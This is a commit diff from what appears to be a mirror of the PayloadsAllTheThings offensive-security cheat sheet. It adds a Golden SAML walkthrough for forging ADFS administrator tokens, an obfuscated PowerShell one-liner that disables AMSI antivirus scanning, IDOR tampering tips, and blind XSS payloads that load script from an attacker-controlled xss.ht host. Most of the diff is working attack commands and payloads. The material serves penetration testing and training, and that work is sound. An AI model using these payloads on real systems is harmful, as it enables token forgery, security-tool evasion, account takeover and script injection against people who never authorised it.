mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
ADFS Golden SAML
This commit is contained in:
parent
c17ae602fc
commit
3e9ef2efbe
@ -11,9 +11,11 @@
|
||||
|
||||
## Tools
|
||||
|
||||
* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
|
||||
* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
|
||||
* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner)
|
||||
* [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html)
|
||||
|
||||
|
||||
## Prerequisites
|
||||
|
||||
* BURP HEADER> `Origin: https://evil.com`
|
||||
|
@ -6,14 +6,15 @@
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploit)
|
||||
* [IDOR Tips](#idor-tips)
|
||||
* [Examples](#examples)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
- Burp Suite plugin Authz
|
||||
- Burp Suite plugin AuthMatrix
|
||||
- Burp Suite plugin Authorize
|
||||
- [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e)
|
||||
- [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e)
|
||||
- [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
|
||||
|
||||
## Exploit
|
||||
|
||||
@ -43,6 +44,15 @@ The value of a parameter is used directly to access application functionality
|
||||
http://foo.bar/accessPage?menuitem=12
|
||||
```
|
||||
|
||||
### IDOR Tips
|
||||
|
||||
* Change the HTTP request: POST → PUT
|
||||
* Change the content type: XML → JSON
|
||||
* Increment/decrement numerical values (1,2,3,..)
|
||||
* GUID/UUID might be weak
|
||||
* Transform numerical values to arrays: `{"id":19} → {"id":[19]}`
|
||||
|
||||
|
||||
## Examples
|
||||
|
||||
* [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
|
||||
|
@ -86,6 +86,8 @@
|
||||
- [ESC9 - No Security Extension](#esc9---no-security-extension)
|
||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||
- [Pass-The-Certificate](#pass-the-certificate)
|
||||
- [Active Directory Federation Services](#active-directory-federation-services)
|
||||
- [ADFS - Golden SAML](#adfs---golden-saml)
|
||||
- [UnPAC The Hash](#unpac-the-hash)
|
||||
- [Shadow Credentials](#shadow-credentials)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
@ -1592,6 +1594,8 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -
|
||||
|
||||
> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
|
||||
|
||||
:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future.
|
||||
|
||||
* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
|
||||
```ps1
|
||||
# Enumerate all gMSAs
|
||||
@ -2639,6 +2643,43 @@ Jane@corp.local is allowed to enroll in the certificate template ESC9 that speci
|
||||
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
|
||||
```
|
||||
|
||||
### Active Directory Federation Services
|
||||
|
||||
#### ADFS - Golden SAML
|
||||
|
||||
Requirements:
|
||||
* ADFS service account
|
||||
* The private key (PFX with the decryption password)
|
||||
|
||||
Exploit:
|
||||
* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations
|
||||
* Convert PFX and Private key to binary format
|
||||
```ps1
|
||||
# For the pfx
|
||||
echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
|
||||
# For the private key
|
||||
echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin
|
||||
```
|
||||
* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof)
|
||||
```ps1
|
||||
mkdir ADFSpoofTools
|
||||
cd $_
|
||||
git clone https://github.com/dmb2168/cryptography.git
|
||||
git clone https://github.com/mandiant/ADFSpoof.git
|
||||
virtualenv3 venvADFSSpoof
|
||||
source venvADFSSpoof/bin/activate
|
||||
pip install lxml
|
||||
pip install signxml
|
||||
pip uninstall -y cryptography
|
||||
cd cryptography
|
||||
pip install -e .
|
||||
cd ../ADFSpoof
|
||||
pip install -r requirements.txt
|
||||
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls
|
||||
/SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
|
||||
```
|
||||
|
||||
|
||||
### UnPAC The Hash
|
||||
|
||||
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
|
||||
@ -4044,3 +4085,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
||||
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
|
||||
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
|
@ -759,6 +759,15 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp
|
||||
[patch]::it()
|
||||
```
|
||||
|
||||
## Other interesting AMSI bypass
|
||||
|
||||
* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1)
|
||||
```ps1
|
||||
$A="5492868772801748688168747280728187173688878280688776828"
|
||||
$B="1173680867656877679866880867644817687416876797271"
|
||||
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true)
|
||||
```
|
||||
|
||||
## AMSI.fail
|
||||
|
||||
> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/
|
||||
|
BIN
Upload Insecure Files/Images/file-upload-mindmap.png
Normal file
BIN
Upload Insecure Files/Images/file-upload-mindmap.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.1 MiB |
@ -23,8 +23,11 @@
|
||||
- [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
|
||||
- [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/)
|
||||
|
||||
|
||||
## Exploits
|
||||
|
||||
![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true)
|
||||
|
||||
### Defaults extensions
|
||||
|
||||
* PHP Server
|
||||
|
@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https:
|
||||
|
||||
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
|
||||
|
||||
```javascript
|
||||
"><script src=//yoursubdomain.xss.ht></script>
|
||||
|
||||
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
|
||||
|
||||
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
|
||||
|
||||
<script>$.getScript("//yoursubdomain.xss.ht")</script>
|
||||
```xml
|
||||
"><script src=//<your.subdomain>.xss.ht></script>
|
||||
<script>$.getScript("//<your.subdomain>.xss.ht")</script>
|
||||
```
|
||||
|
||||
### Other Blind XSS tools
|
||||
|
Loading…
Reference in New Issue
Block a user